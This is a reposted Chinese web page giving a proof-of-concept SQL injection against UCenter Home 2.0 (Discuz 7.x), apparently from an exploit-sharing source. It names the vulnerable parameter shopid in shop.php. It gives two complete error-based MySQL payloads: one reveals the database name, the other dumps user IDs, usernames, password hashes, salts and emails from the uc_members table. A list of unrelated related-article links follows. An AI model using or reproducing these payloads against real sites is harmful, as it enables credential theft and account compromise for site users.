当前位置: 首页 > news >正文

Discuz7.X通杀0day(UCenter Home-2.0) poc

作者: inj3ct0r

漏洞文件 : Shop.php
漏洞表现: ?ac=view&shopid=
漏洞类型 : SQL Injection (MySQL Error Based)
利用POC:
1、查询出UC_HOME的DATABSE:

and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

2、根据1查询出的DATABSE(替换XXOO_UC_DB),进一步注入出member信息:

and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0×27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
trackback

>

相关文章:

  • Kracker路由器破解工具
  • 代码之美 - 如何写出优雅的PHP代码
  • Mysql数据库的安全设置方法大全
  • Struts 2实现文件过滤
  • ewebeditor安全解决方案
  • 文件上传过滤
  • 拦截器实现文件过滤(JSP)
  • LFI本地包含漏洞利用小技巧
  • MSSQL注入防范安全策略大全
  • NWebsec 1.0.3 The Security library for ASP.NET
  • 详细MSSQL注入语句
  • Microsoft IIS 短文件名/目录名 枚举漏洞
  • 如何更有效使用 Rational AppScan 扫描大型网站
  • Thinksns微博系统注入漏洞即后台拿webshell
  • PJBlog 3.2.9.518 getwebshell 漏洞
  • [rust! #004] [译] Rust 的内置 Traits, 使用场景, 方式, 和原因
  • 30秒的PHP代码片段(1)数组 - Array
  • ABAP的include关键字,Java的import, C的include和C4C ABSL 的import比较
  • centos安装java运行环境jdk+tomcat
  • css系列之关于字体的事
  • es6(二):字符串的扩展
  • happypack两次报错的问题
  • JavaScript服务器推送技术之 WebSocket
  • Synchronized 关键字使用、底层原理、JDK1.6 之后的底层优化以及 和ReenTrantLock 的对比...
  • vue.js框架原理浅析
  • 从 Android Sample ApiDemos 中学习 android.animation API 的用法
  • 前端工程化(Gulp、Webpack)-webpack
  • 前端每日实战 2018 年 7 月份项目汇总(共 29 个项目)
  • 实习面试笔记
  • 线上 python http server profile 实践
  • 学习使用ExpressJS 4.0中的新Router
  • 一份游戏开发学习路线
  • 在Docker Swarm上部署Apache Storm:第1部分
  • ​香农与信息论三大定律
  • (java版)排序算法----【冒泡,选择,插入,希尔,快速排序,归并排序,基数排序】超详细~~
  • (附源码)springboot太原学院贫困生申请管理系统 毕业设计 101517
  • (附源码)ssm基于jsp的在线点餐系统 毕业设计 111016
  • (六)c52学习之旅-独立按键
  • (十六)Flask之蓝图
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (一)spring cloud微服务分布式云架构 - Spring Cloud简介
  • *(长期更新)软考网络工程师学习笔记——Section 22 无线局域网
  • .net 重复调用webservice_Java RMI 远程调用详解,优劣势说明
  • .NET/C# 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions)
  • .net访问oracle数据库性能问题
  • .NET基础篇——反射的奥妙
  • .NET轻量级ORM组件Dapper葵花宝典
  • .Net下的签名与混淆
  • .Net转Java自学之路—SpringMVC框架篇六(异常处理)
  • @Autowired多个相同类型bean装配问题
  • [20170713] 无法访问SQL Server
  • [Angular] 笔记 20:NgContent
  • [C# WPF] DataGrid选中行或选中单元格的背景和字体颜色修改
  • [C/C++]数据结构 栈和队列()
  • [codevs 2822] 爱在心中 【tarjan 算法】